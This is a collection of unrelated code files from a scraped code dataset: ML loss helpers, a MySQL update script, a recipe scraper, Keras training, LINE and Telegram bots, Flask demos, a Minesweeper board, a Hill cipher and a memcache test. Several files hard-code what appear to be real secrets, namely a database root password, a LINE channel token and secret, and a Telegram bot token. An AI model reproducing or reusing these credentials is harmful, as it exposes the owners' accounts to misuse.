0\n zeros = torch.zeros_like(z0sample)\n log_pz = log_density_gaussian(z0sample, zeros, zeros).sum(1)\n\n mat_log_qz = matrix_log_density_gaussian(latent_sample, *latent_dist)\n\n if is_mss:\n # use stratification\n log_iw_mat = log_importance_weight_matrix(batch_size, n_data).to(latent_sample.device)\n mat_log_qz = mat_log_qz + log_iw_mat.view(batch_size, batch_size, 1)\n\n log_qz = torch.logsumexp(mat_log_qz.sum(2), dim=1, keepdim=False)\n log_prod_qzi = torch.logsumexp(mat_log_qz, dim=1, keepdim=False).sum(1)\n\n return log_pz, log_qz, log_prod_qzi, log_q_zCx\n\ndef matrix_log_density_gaussian(x, mu, logvar):\n \"\"\"Calculates log density of a Gaussian for all combination of bacth pairs of\n `x` and `mu`. I.e. return tensor of shape `(batch_size, batch_size, dim)`\n instead of (batch_size, dim) in the usual log density.\n\n Parameters\n ----------\n x: torch.Tensor\n Value at which to compute the density. Shape: (batch_size, dim).\n\n mu: torch.Tensor\n Mean. Shape: (batch_size, dim).\n\n logvar: torch.Tensor\n Log variance. Shape: (batch_size, dim).\n\n batch_size: int\n number of training images in the batch\n \"\"\"\n batch_size, dim = x.shape\n x = x.view(batch_size, 1, dim)\n mu = mu.view(1, batch_size, dim)\n logvar = logvar.view(1, batch_size, dim)\n return log_density_gaussian(x, mu, logvar)\n\n\ndef log_density_gaussian(x, mu, logvar):\n \"\"\"Calculates log density of a Gaussian.\n\n Parameters\n ----------\n x: torch.Tensor or np.ndarray or float\n Value at which to compute the density.\n\n mu: torch.Tensor or np.ndarray or float\n Mean.\n\n logvar: torch.Tensor or np.ndarray or float\n Log variance.\n \"\"\"\n normalization = - 0.5 * (math.log(2 * math.pi) + logvar)\n inv_var = torch.exp(-logvar)\n log_density = normalization - 0.5 * ((x - mu)**2 * inv_var)\n return log_density\n\n\ndef log_importance_weight_matrix(batch_size, dataset_size):\n \"\"\"\n Calculates a log importance weight matrix\n\n Parameters\n ----------\n batch_size: int\n number of training images in the batch\n\n dataset_size: int\n number of training images in the dataset\n \"\"\"\n N = dataset_size\n M = batch_size - 1\n strat_weight = (N - M) / (N * M)\n W = torch.Tensor(batch_size, batch_size).fill_(1 / M)\n W.view(-1)[::M + 1] = 1 / N\n W.view(-1)[1::M + 1] = strat_weight\n W[M - 1, 0] = strat_weight\n return W.log()\n","sub_path":"trainers/loss_helpers.py","file_name":"loss_helpers.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"290459464","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : update_host_code.py\n# @Author: Cedar\n# @Date : 2020/5/22\n# @Desc :\n\n\nimport model.lib.common as common\nimport pymysql\n\n\ndef update_host_code():\n # 连接mysql\n config = {\n 'host': '192.168.1.118',\n 'port': 3306,\n 'user': 'root',\n 'passwd': 'poms@db',\n 'db': 'mymonitor',\n 'charset': 'utf8mb4',\n 'cursorclass': pymysql.cursors.DictCursor\n }\n\n # 1.查询操作\n # 编写sql 查询语句\n select_sql = \"select Column_Link_ID,URL from column_link where host_code is null limit 1000;\"\n # update_sql = \"update column_link set host_code='{}' where Column_Link_ID={};\"\n update_sql_pattern = \"UPDATE column_link SET host_code = CASE Column_Link_ID {} END WHERE Column_Link_ID IN {};\"\n when_then_pattern = \" WHEN {} THEN '{}' \"\n id_list = []\n try:\n results = common.query_mysql(config, select_sql) # 获取查询的所有记录\n\n when_then = \"\"\n # 遍历结果\n for row in results:\n Column_Link_ID = row['Column_Link_ID']\n url = row['URL']\n host_code = common.get_host_code(url)\n if len(host_code) > 50:\n continue\n # sql = update_sql.format(host_code, Column_Link_ID)\n when_then = when_then + when_then_pattern.format(Column_Link_ID, host_code)\n id_list.append(Column_Link_ID)\n\n id_tuple = tuple(id_list)\n sql = update_sql_pattern.format(when_then, id_tuple)\n print(sql)\n try:\n common.query_mysql(config, sql)\n except Exception as e:\n print(e)\n\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n for i in range(31481):\n update_host_code()\n # time.sleep(1)\n","sub_path":"tool/temp/update_host_code.py","file_name":"update_host_code.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"22882029","text":"import pandas as pd\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup\n\nexecutable_path = {'executable_path': '/usr/local/bin/chromedriver'}\nbrowser = Browser('chrome', **executable_path, headless=False)\n\n# Function to grab ingredients and instructions from rabbit and wolves inner-page\ndef grab_details_hbh(url):\n\n browser.visit(url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n recipe_ingredients_detail = soup.find_all('li', attrs={'class': 'wprm-recipe-ingredient'})\n ingredients_list = []\n\n for ingredients in recipe_ingredients_detail:\n ingredients_list.append(ingredients.text)\n\n recipe_instructions_detail = soup.find_all('li', attrs={'class': 'wprm-recipe-instruction'})\n instructions_list = []\n\n for instruction in recipe_instructions_detail:\n instructions_list.append(instruction.text)\n\n # Extract Image\n post_content = soup.find(\"div\", attrs={\"class\": \"post-content\"}).find_all_next(\"img\")\n image_list = []\n for img in post_content:\n try:\n if img['alt']:\n string = str(img['alt'])\n if \"horizontal photo\" in string:\n image = img['data-src']\n image_list.append(image)\n\n except Exception as e:\n pass\n\n return ingredients_list, instructions_list, image_list\n\n# Function to grab link from half baked harvest recipes page\ndef halfbakedharvest():\n\n my_dict = {}\n\n url = 'https://www.halfbakedharvest.com/category/recipes/'\n browser.visit(url)\n\n for x in range(1, 10):\n\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n recipes = soup.find_all('a', class_='recipe-block')\n\n for recipe in recipes:\n\n recipe_link = recipe['href']\n my_dict[recipe.img['title']] = [recipe_link]\n\n # Iterate through to the next page\n browser.visit(f\"{url}page/{x}/\")\n\n for recipe_name in my_dict:\n\n link = my_dict[recipe_name]\n details = grab_details_hbh(link[0])\n ingredients, instructions, image = details\n\n my_dict[recipe_name].append(ingredients)\n my_dict[recipe_name].append(instructions)\n if image:\n my_dict[recipe_name].append(image[0])\n else:\n print(\"Image not found!\")\n\n print(my_dict)\n\n return my_dict\n\ndict = halfbakedharvest()\n\ndf = pd.DataFrame(dict.values(), index=dict.keys(), columns=['Link', 'Ingredients', 'Instructions', \"Image\"])\n\nprint(df.head())\n\ndf.to_excel(\"/Users/garretteichhorn/Desktop/github_repos/recipe_generator/excel_files/halfbakedharvest_recipes.xlsx\")\n","sub_path":"recipe_app/02 - web_scraping/halfbakedharvest_recipes.py","file_name":"halfbakedharvest_recipes.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"204114980","text":"import tensorflow as tf\nimport keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom keras import utils as np_utils\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom PIL import Image\n\npath_x = 'Data\\\\x\\\\'\npath_y1 = 'Data\\\\y1\\\\'\npath_y2 = 'Data\\\\y2\\\\'\nimg_size = [576,778]\n\nimlist = os.listdir(path_x)[:500]\nnum_samples = len(imlist)\n\n'''\n#Test if the numpy array is correctly read\nim1 = np.load(path_x + imlist[0])\nplt.imshow(im1)\nplt.show()\n'''\n\nimmatrix = np.array([np.load(path_x + file_name).flatten() for file_name in imlist],'f')\nlabel = np.array([np.load(path_y1 + file_name).flatten() for file_name in imlist],'f')\n\ndata,Label = shuffle(immatrix,label,random_state = 2)\ntrain_data = [data,Label]\nprint('x_train shape, y_train shape:\\t',train_data[0].shape,train_data[1].shape)\n\n'''\n#Test if the numpy array is correctly read\nimg = train_data[0][20].reshape(img_size[1],img_size[0])\nplt.imshow(img)\nplt.show()\n'''\n\nbatch_size = 20\nnum_classes = 2\nnum_epochs = 20\nnum_channels = 1\nnum_filters = 4\nnum_pool = 2\nkernel_size = 3\n\n(X,y) = (train_data[0],train_data[1])\nx_train,x_test,y_train,y_test = train_test_split(X, y, test_size = 0.2, random_state = 4)\n#proccess train and test input data\nx_train = x_train.reshape(x_train.shape[0],img_size[1],img_size[0])\nx_train = x_train.astype('float32')\nx_train /= 225\nx_test = x_test.reshape(x_test.shape[0],img_size[1],img_size[0])\nx_test = x_test.astype('float32')\nx_test /= 225\n\n#y_train = np_utils.to_categorical(y_train,num_classes)\n#y_test = np_utils.to_categorical(y_test,num_classes)\n\nmodel = keras.models.Sequential()\nmodel.add(keras.layers.Flatten(input_shape=((img_size[1],img_size[0]))))\nmodel.add(keras.layers.Dense(256, activation=tf.nn.relu))\nmodel.add(keras.layers.Dropout(0.2))\nmodel.add(keras.layers.Dense(1))\n\noptimizer = tf.train.RMSPropOptimizer(0.001)\nmodel.compile(loss='mse',\n optimizer=optimizer,\n metrics=['mae'])\n\nmodel.fit(x_train, y_train, epochs=num_epochs)\nprint('train:',model.evaluate(x_train, y_train))\nprint('test:',model.evaluate(x_test, y_test))\nmodel.save('v0.1')\n#plot\n\ndef plot_image(i, predictions_array, true_label, img):\n\tprediction, true_label, img = predictions_array[i], true_label[i],\\\n\t img[i].reshape((img_size[1],img_size[0]))\n\tplt.grid(False)\n\tplt.xticks([])\n\tplt.yticks([])\n\tplt.imshow(img)\n\tplt.xlabel(\"{} ({})\".format(prediction[0],true_label),\n color='black')\n\tplt.show()\n\npredictions = model.predict(x_test)\nfor i in range(99):\n\tplot_image(i, predictions, y_test, x_test)","sub_path":"train_regression.py","file_name":"train_regression.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"625461786","text":"import os, re, json\nfrom datetime import datetime, date, timedelta\nfrom flask import Flask, request, abort\nfrom textblob import TextBlob\nimport requests\nfrom linebot import (\n LineBotApi, WebhookHandler\n)\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot.models import (\n MessageEvent, TextMessage, TextSendMessage,\n)\n\napp = Flask(__name__)\n\nline_bot_api = LineBotApi('6YUtLz3LrrEPOMnxZLiZLS8lqkK6cEFIlbgqlNJ5BfwjYlV47vkbgDpanyR7UYXfFwn3+5IEvxgEIQX3SrB462J9/FrwEXO1vllaiL5jbcfU4daqLE7GIwflVOG+KXc1Bv5JquQ1fbAZlpbIASGG3AdB04t89/1O/w1cDnyilFU=')\nhandler = WebhookHandler('a43d81c39b3638058ee9e84194da780d')\n\n@app.route('/')\ndef homepage():\n the_time = datetime.now().strftime(\"%A, %d %b %Y %l:%M %p\")\n\n return \"\"\"\n

    Hello Translator-Bot

    \n

    It is currently {time}.

    \n \"\"\".format(time=the_time)\n\n@app.route(\"/callback\", methods=['POST'])\ndef callback():\n # get X-Line-Signature header value\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # handle webhook body\n try:\n handler.handle(body, signature)\n except InvalidSignatureError:\n abort(400)\n\n return 'OK'\n\ndef translate_text(text): \n tb = TextBlob(text) \n lang = tb.detect_language()\n trans_text = \"\"\n if lang == \"en\": \n trans_text = str(tb.translate(to='vi'))\n else:\n trans_text = str(tb.translate(to='en')) \n return trans_text\n\n@handler.add(MessageEvent, message=TextMessage)\ndef handle_message(event):\n text = event.message.text \n if text == \"\" or \"#\" in text or len(text) < 4:\n return\n else: \n translated = translate_text(event.message.text) \n line_bot_api.reply_message(\n event.reply_token,\n TextSendMessage(translated))\n \n\nif __name__ == \"__main__\":\n app.run(debug=True, use_reloader=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"319297974","text":"from flask import Flask, render_template, request\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return 'Index Page'\n\n@app.route('/hello')\ndef hello(name='Robin'):\n name = name.lower()\n return render_template('hello.html', name=name)\n\n@app.route('/features', methods = ['POST'])\ndef features():\n text = \"Amazing grace how sweet the sound\"\n textlength = len(text)\n return render_template('features.html', name = textlength, msg = text)\n\n\n@app.route('/textr', methods = ['GET', 'POST'])\ndef my_form():\n return render_template(\"my-form.html\")\n\n@app.route('/textr', methods = ['POST'])\ndef my_form_post():\n\n text = request.form['text']\n processed_text = text.upper()\n return processed_text\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run()\n","sub_path":"flasksite/begin.py","file_name":"begin.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569203175","text":"import cv2 as cv\nimport numpy as np\nfrom datetime import datetime\n\n# Create a VideoCapture object\ncap = cv.VideoCapture(0,cv.CAP_DSHOW)\npath='output_'+str(datetime.now().strftime(\"%d-%m-%Y_%I-%M-%S_%p\"))+'.mp4'\n# Check if camera opened successfully\nif (cap.isOpened() == False): \n print(\"Unable to read camera feed\")\n \n# Default resolutions of the frame are obtained.The default resolutions are system dependent.\n# We convert the resolutions from float to integer.\nframe_width = int(cap.get(3))\nframe_height = int(cap.get(4))\nprint('[INFO] Frame size : '+str(frame_width)+', '+str(frame_height))\nprint('[INFO] Path write : '+str(path))\nprint('[INFO] Press \\\"q\\\" to end the capture')\n# Define the codec and create VideoWriter object.The output is stored in 'outpy.avi' file.\nout = cv.VideoWriter(path,cv.VideoWriter_fourcc(*'mp4v'), 10, (frame_width,frame_height))\nwhile(True):\n ret, frame = cap.read()\n \n if ret == True: \n \n # Write the frame into the file 'output.avi'\n out.write(frame)\n \n # Display the resulting frame \n cv.imshow('frame',frame)\n \n # Press Q on keyboard to stop recording\n if cv.waitKey(1) & 0xFF == ord('q'):\n break\n \n # Break the loop\n else:\n break \n \n# When everything done, release the video capture and video write objects\ncap.release()\nout.release()\n \n# Closes all the frames\ncv.destroyAllWindows() ","sub_path":"recordVideo.py","file_name":"recordVideo.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"299511931","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, String, Integer, Text\nfrom sqlalchemy.orm import sessionmaker\n\nengine = create_engine('mysql://root@localhost:3307/niputv_activity?charset=utf8')\nBase = declarative_base()\nSession = sessionmaker(bind=engine)\nsession = Session()\n\nclass Playrecording(Base):\n\n __tablename__ = 'playrecording'\n\n id = Column(Integer, primary_key=True)\n ip = Column(Text)\n vid = Column(Text)\n\nif __name__ == '__main__':\n Base.metadata.create_all(engine)","sub_path":"app/db/createtab.py","file_name":"createtab.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"40300821","text":"# -*- coding: utf-8 -*-\n\n# Created on 2017-11-28\n# author: 欧度智能,https://www.odooai.cn\n# email: 300883@qq.com\n# resource of odooai\n# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl).\n\n# Odoo16在线用户手册(长期更新)\n# https://www.odooai.cn/documentation/16.0/zh_CN/index.html\n\n# Odoo16在线开发者手册(长期更新)\n# https://www.odooai.cn/documentation/16.0/zh_CN/developer.html\n\n# Odoo13在线用户手册(长期更新)\n# https://www.odooai.cn/documentation/user/13.0/zh_CN/index.html\n\n# Odoo13在线开发者手册(长期更新)\n# https://www.odooai.cn/documentation/13.0/index.html\n\n# Odoo在线中文用户手册(长期更新)\n# https://www.odooai.cn/documentation/user/10.0/zh_CN/index.html\n\n# Odoo10离线中文用户手册下载\n# https://www.odooai.cn/odoo10_user_manual_document_offline/\n# Odoo10离线开发手册下载-含python教程,jquery参考,Jinja2模板,PostgresSQL参考(odoo开发必备)\n# https://www.odooai.cn/odoo10_developer_document_offline/\n# description:\n\nfrom odoo import api, fields, models, exceptions, _\n\nclass ProductCategory(models.Model):\n _inherit = 'product.category'\n\n # 更新 complete_name 算法,当有context: show_short =1 时,只显示短名\n def name_get(self):\n if self._context.get('show_short'):\n new_res = []\n for category in self:\n name = category.name\n new_res.append((category.id, name))\n return new_res\n else:\n return super(ProductCategory, self).name_get()\n","sub_path":"app_website_product_superbar/models/product_category.py","file_name":"product_category.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"589517203","text":"import json\nimport requests\nimport urllib\nimport schedule\n\n\nTOKEN = \"429105357:AAHs2gkeSxYljcm8UkKRoM9lmDyJ7DPqj6g\"\nURL = \"https://api.telegram.org/bot{}/\".format(TOKEN)\n\n\ndef send_http_get_req(req_url):\n response = requests.get(req_url)\n content = response.content.decode(\"utf8\")\n return content\n\n\ndef get_json_from_url(url):\n content = send_http_get_req(url)\n js = json.loads(content)\n return js\n\n\ndef get_bot_information():\n url = URL + \"getMe\"\n js = get_json_from_url(url)\n return js\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates[\"result\"])\n last_update = num_updates - 1\n text = updates[\"result\"][last_update][\"message\"][\"text\"]\n chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n return text, chat_id\n\n\ndef send_message(text, chat_id):\n text = urllib.parse.quote_plus(text)\n url = URL + \"sendMessage?text={}&chat_id={}\".format(text, chat_id)\n send_http_get_req(url)\n\n\ndef get_updates(offset=None):\n url = URL + \"getUpdates?timeout=2\"\n if offset:\n url += \"&offset={}\".format(offset)\n js = get_json_from_url(url)\n return js\n\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates[\"result\"]:\n update_ids.append(int(update[\"update_id\"]))\n return max(update_ids)\n\n\ndef parse_message(updates):\n for update in updates[\"result\"]:\n try:\n text = (update[\"message\"][\"text\"]).rstrip().lower()\n chat = update[\"message\"][\"chat\"][\"id\"]\n except Exception as e:\n print(e)\n return text, chat\n\n\ndef send_forgot(text, chat_id):\n url = URL + \"sendMessage?text={}&chat_id={}\".format(\"Take a pill! \" + text, chat_id)\n send_http_get_req(url)\n\n\ndef send_reminder(text, chat_id):\n url = URL + \"sendMessage?text={}&chat_id={}\".format(\"Take a pill! \" + text, chat_id)\n send_http_get_req(url)\n schedule.every(5).minutes.do(send_forgot, text + \" don't forget\").tag('forgot')\n","sub_path":"chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"586469787","text":"import random\n\nfrom vec2d import Vec2D\nfrom sprite import SpriteGroup\nfrom cell import Cell\nfrom tileset import Tileset\nfrom settings import *\n\n\nclass Board(SpriteGroup):\n def __init__(self, size, mines, tileset=DEFAULT_TILESET, *sprites):\n super(Board, self).__init__(*sprites)\n\n self.size = size\n self.mines = mines\n\n assert self.mines <= self.size[0] * self.size[1], \\\n 'The number of mines should be at most equal to\\\n the number of cells on the board.'\n\n self.tileset = Tileset(TILESET_PATH + tileset)\n Cell.tileset = self.tileset\n\n self.cells = [[Cell() for column in range(self.size[1])]\n for row in range(self.size[0])]\n self.position = Vec2D((DEFAULT_SCREEN_SIZE[0] -\n self.size[0] * self.tileset.tile_side) / 2,\n (DEFAULT_SCREEN_SIZE[1] -\n self.size[1] * self.tileset.tile_side) / 2)\n\n for row_index, row in enumerate(self.cells):\n for column_index, cell in enumerate(row):\n cell.position = (self.position +\n Vec2D(self.tileset.tile_side * column_index,\n self.tileset.tile_side * row_index))\n self.add(cell)\n\n self._init_mines()\n self._init_values()\n\n def __getitem__(self, key):\n return self.cells[key]\n\n def __iter__(self):\n for row in self.cells:\n for cell in row:\n yield cell\n\n def _init_mines(self):\n rows = self.size[0]\n columns = self.size[1]\n placed_mines = 0\n\n while placed_mines < self.mines:\n random_row = random.randint(0, rows-1)\n random_column = random.randint(0, columns-1)\n\n if self.cells[random_row][random_column].value != CELL_VALUES.MINE:\n self.cells[random_row][random_column].value = CELL_VALUES.MINE\n placed_mines += 1\n\n def _init_values(self):\n for row_index, row in enumerate(self.cells):\n for column_index, cell in enumerate(row):\n if cell.value != CELL_VALUES.MINE:\n cell.value = self._adjacent_mines(row_index, column_index)\n\n def _adjacent_mines(self, row, column):\n surrounding_cells = [(row-1, column), (row, column-1), (row+1, column),\n (row, column+1), (row-1, column+1),\n (row+1, column+1), (row-1, column-1),\n (row+1, column-1)]\n surrounding_mines = 0\n for cell in surrounding_cells:\n surrounding_mines += (cell[0] >= 0 and cell[0] < self.size[0] and\n cell[1] >= 0 and cell[1] < self.size[1] and\n (self.cells[cell[0]][cell[1]].value ==\n CELL_VALUES.MINE))\n return surrounding_mines\n\n def _adjacent_empty_cells(self, row, column):\n surrounding_cells = [(row-1, column), (row, column-1), (row+1, column),\n (row, column+1), (row-1, column+1),\n (row+1, column+1), (row-1, column-1),\n (row+1, column-1)]\n\n if self.cells[row][column].state == CELL_STATES.CLOSED:\n self.cells[row][column].state = CELL_STATES.OPEN\n\n if (self.cells[row][column].value not in\n [CELL_VALUES.MINE, CELL_VALUES.ZERO]):\n return\n\n for cell in surrounding_cells:\n if (cell[0] >= 0 and cell[0] < self.size[0] and cell[1] >= 0 and\n cell[1] < self.size[1] and\n self.cells[cell[0]][cell[1]].state == CELL_STATES.CLOSED):\n self._adjacent_empty_cells(*cell)\n\n def update(self, events):\n for event in events:\n if event.type == pygame.MOUSEBUTTONDOWN:\n cell = self.get_cell(*event.pos)\n\n if cell is not None:\n if event.button == MOUSE_BUTTONS.LEFT:\n cell.open()\n if cell.value == CELL_VALUES.ZERO:\n self._adjacent_empty_cells(*self.get_coords(cell))\n elif event.button == MOUSE_BUTTONS.RIGHT:\n cell.flag_unflag()\n\n super(Board, self).update()\n\n def get_cell(self, x_pixels, y_pixels):\n cell_x = int((x_pixels - self.position.x) / TILE_SIZE[0])\n cell_y = int((y_pixels - self.position.y) / TILE_SIZE[1])\n\n if (cell_x >= 0 and cell_x < self.size[0] and cell_y >= 0 and\n cell_y < self.size[1]):\n return self.cells[cell_y][cell_x]\n else:\n return None\n\n def get_coords(self, cell):\n for row_index, row in enumerate(self.cells):\n for column_index, possible_cell in enumerate(row):\n if possible_cell is cell:\n return (row_index, column_index)\n\n def reveal(self):\n for cell in self:\n cell.state = CELL_STATES.OPEN\n\n def set_position(self, position):\n for cell in self:\n cell.position += position - self.position\n\n self.position = position\n","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"641566748","text":"import numpy as np \n#-----------------------------------------------CIFRADO--------------------------------------------------\npalabra = input(\"Ingrese palabra a cifrar: \")\nprint(\"-------------------CIFRADO----------------------\")\nprint(palabra+\"\\n\")\nnumero = [ord(entrada)-48 for entrada in palabra]\ncifrado_p1 = [75 if mov==-16 else mov for mov in numero]\ncorrector = 0\nwhile corrector == 0:# Esto pondra 0 en los espacios faltantes del mensaje\n if len(cifrado_p1)%3 != 0:\n cifrado_p1 = cifrado_p1 + [76]\n else: \n corrector = 1 \nfilas = int(len(cifrado_p1)/3)\nprint(\"La clave es:\")\nllave = np.array([[5, 8, 1],[2, 3, 4],[9, 6, 2]])\nprint(llave)\nmatriz = np.array(cifrado_p1).reshape(filas,3)\nmatriz_code = [np.array(np.dot(matriz[pivote,:],llave)).tolist() for pivote in range(filas)]\nlista_lista = [(matriz_code[uno][dos])%76 for uno in range(filas) for dos in range(3)]\npal_cifra = [chr(num+48) for num in lista_lista]\nunion = ''.join(pal_cifra)\nprint(\"\\n\\npalabra cifrada es\\n\")\nprint(union)","sub_path":"Com2_/hill_1.py","file_name":"hill_1.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"88274895","text":"# https://leetcode.com/problems/intersection-of-two-linked-lists/\nimport unittest\n\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:\n if not headA or not headB:\n return None\n pt1 = headA\n pt2 = headB\n pt1_len, pt1end = self.get_len(headA)\n pt2_len, pt2end = self.get_len(headB)\n if pt1end != pt2end:\n return None\n\n if pt1_len < pt2_len:\n for i in range(pt2_len - pt1_len):\n pt2 = pt2.next\n else:\n for i in range(pt1_len - pt2_len):\n pt1 = pt1.next\n\n while pt1 and pt2:\n if pt1 == pt2:\n return pt1\n pt1 = pt1.next\n pt2 = pt2.next\n\n def get_len(self, pointer):\n num = 1\n while pointer:\n pointer = pointer.next\n num += 1\n end = pointer\n return num, end\n\n\ndef set_up(arrA, arrB, arrC):\n if arrA != []:\n headA = ListNode(arrA[0])\n tempA = headA\n for a in arrA[1:]:\n tempA.next = ListNode(a)\n tempA = tempA.next\n else:\n headA = ListNode(None)\n tempA = headA\n if arrA != []:\n headB = ListNode(5)\n tempB = headB\n for b in arrB[1:]:\n tempB.next = ListNode(b)\n tempB = tempB.next\n else:\n headB = ListNode(None)\n tempB = headB\n\n conC = ListNode(arrC[0])\n tempC = conC\n for c in arrC[1:]:\n tempC.next = ListNode(c)\n tempC = tempC.next\n tempA.next = conC if tempA.val else None\n tempB.next = conC if tempB.val else None\n return headA, headB, conC\n\n\nclass TestIntersect(unittest.TestCase):\n def test_empty(self):\n headA, headB, _ = set_up([], [1, 2, 3], [4, 5])\n self.assertEqual(Solution().getIntersectionNode(headA, headB), None)\n self.assertEqual(Solution().getIntersectionNode(\n ListNode(None), ListNode(None)), None)\n\n def test_intersect(self):\n # same length\n headA, headB, con = set_up([1, 2, 3], [4, 5, 6], [7, 8, 9])\n self.assertEqual(Solution().getIntersectionNode(headA, headB), con)\n # longer headA\n headA, headB, con = set_up([1, 2, 3, 4], [5, 6], [7, 8, 9])\n self.assertEqual(Solution().getIntersectionNode(headA, headB), con)\n # longer headB\n headA, headB, con = set_up([1, 2], [3, 4, 5, 6], [7, 8, 9])\n self.assertEqual(Solution().getIntersectionNode(headA, headB), con)\n\n\ndef main():\n # headA, headB = set_up([4, 1], [5, 6, 1], [8, 4, 5])\n # sol = Solution()\n # print(sol.getIntersectionNode(headA, headB).val)\n unittest.main()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"Easy/Intersection_of_Two_Linked_Lists.py","file_name":"Intersection_of_Two_Linked_Lists.py","file_ext":"py","file_size_in_byte":2819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"258178320","text":"\"\"\"\n test_multicache.py\n\n PURPOSE\n Tests the multicache library -- a wrapper for memcache that allows for\n the storage of arbitrarily large objects\n\n NOTES\n If you change test class name, be sure to update in main block at bottom.\n _create_suite\n\n REFERENCES\n\n LICENSE\n Tom at klenwell@gmail.com\n some rights reserved, 2011\n\"\"\"\n#\n# Imports\n#\n# Python Imports\nimport sys, os, pdb, logging\nfrom os.path import (abspath, dirname, join as osjoin, exists)\nfrom datetime import(datetime, date, timedelta)\nfrom random import (randint, choice, sample)\nimport hashlib\n\n# Extend sys.path\nPROJECT_PATH = abspath(osjoin(dirname(__file__), '../..'))\nif PROJECT_PATH not in sys.path:\n sys.path.append(PROJECT_PATH)\n\n# App Engine Imports\nfrom google.appengine.ext import (testbed, db)\n\n# Appswell Imports\nfrom framework.lib.testing import (AppswellUnitTest, run_test_from_command_line)\nfrom framework.lib import (multicache)\n\n\n#\n# Module Parameters\n#\n# Test Configuration\nTEST_CONFIG = {\n 'BREAK' : False,\n 'VERBOSE' : False,\n}\n\n# Exception Classes\nclass TemplateException(Exception): pass\n\n\n#\n# Test Class\n#\nclass MulticacheTest(AppswellUnitTest):\n\n #\n # Harness\n #\n def setUp(self):\n self.testbed = testbed.Testbed()\n self.testbed.activate()\n self.testbed.init_datastore_v3_stub()\n self.testbed.init_memcache_stub()\n\n def tearDown(self):\n self.testbed.deactivate()\n\n def get_cache_data(self, num_items):\n cache_data = {}\n\n for i in range(num_items):\n key = 'key_%s' % (i)\n value = hashlib.md5(str(i)).hexdigest()\n cache_data[key] = value\n\n return cache_data\n\n #\n # Unit Tests\n #\n def test_shallow_deep_object(self):\n \"\"\"a dict of a 60 items, each a dict of 20000 items\"\"\"\n # cache params\n cache_key = 'test_shallow_deep_object'\n cache_len = 60\n num_items = 3\n num_sub_items = 20000\n\n # prepare cache data and save\n cache_data = {}\n for n in range(num_items):\n cache_data[n] = self.get_cache_data(num_sub_items)\n multicache.set(cache_key, cache_data, cache_len)\n\n # retrieve data\n retrieved_data = multicache.get(cache_key)\n\n # test\n self.assertEqual(cache_data[2].items().sort(),\n retrieved_data[2].items().sort())\n self.assertEqual(cache_data.keys().sort(), retrieved_data.keys().sort())\n\n def test_complex_multi_cache(self):\n \"\"\"a dict of a 5000 items, each a dict of 20 items\"\"\"\n # cache params\n cache_key = 'test_complex_multi_cache'\n cache_len = 60\n num_items = 5000\n num_sub_items = 20\n\n # prepare cache data and save\n cache_data = {}\n for n in range(num_items):\n cache_data[n] = self.get_cache_data(num_sub_items)\n multicache.set(cache_key, cache_data, cache_len)\n\n # retrieve data\n retrieved_data = multicache.get(cache_key)\n\n # test\n logging.info([cache_data[1000], retrieved_data[1000]])\n self.assertEqual(cache_data[1000].items().sort(),\n retrieved_data[1000].items().sort())\n self.assertEqual(cache_data.keys().sort(), retrieved_data.keys().sort())\n\n def test_multi_cache(self):\n \"\"\"this should just save using memcache\"\"\"\n # cache params\n cache_key = 'test_multi_cache'\n cache_len = 60\n num_items = 20000\n\n # prepare cache data and save\n cache_data = self.get_cache_data(num_items)\n multicache.set(cache_key, cache_data, cache_len)\n\n # retrieve data\n 